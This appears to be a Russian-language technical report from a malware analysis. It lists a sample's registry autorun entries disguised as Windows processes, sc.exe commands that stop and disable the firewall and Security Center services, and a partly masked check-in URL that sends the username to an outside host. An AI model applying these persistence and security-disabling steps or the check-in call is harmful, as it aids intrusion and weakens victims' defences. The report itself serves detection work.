Техническая информация
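- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'smss' = 'c:\winlogon.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'shell' = 'Explorer.exe "c:\winlogon.exe"'
  (Оба параметра обеспечивают автозапуск файла c:\winlogon.exe. Имена «smss» и «winlogon.exe» имитируют системные процессы Windows; подлинные smss.exe и winlogon.exe находятся в <SYSTEM32>, а не в корне диска C:, а штатное значение параметра 'shell' — 'Explorer.exe' без дополнительных аргументов.)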
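- <SYSTEM32>\sc.exe stop sharedAccess sc config sharedAccess start=disabled
- <SYSTEM32>\sc.exe stop wscsvc sc config wscsvc start=disabled
  (Командные строки приведены в том виде, в каком они были зафиксированы. Они направлены на остановку и отключение службы SharedAccess — брандмауэр Windows / общий доступ к подключению Интернета — и службы wscsvc — Центр обеспечения безопасности Windows.)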
- %PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE http://ch####.shinranet.com/A2Corp/update.php?da########################### 12:50:16 PM:::...<br>Instalacion Completa<br></b>&user=%USERNAME%
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\update[1].php
- 'ch####.shinranet.com':80
- 'localhost':1036
- ch####.shinranet.com/A2Corp/update.php?da#################################################################################################
- DNS ASK ch####.shinranet.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: 'Inside - Microsoft Internet Explorer'
- ClassName: '' WindowName: ''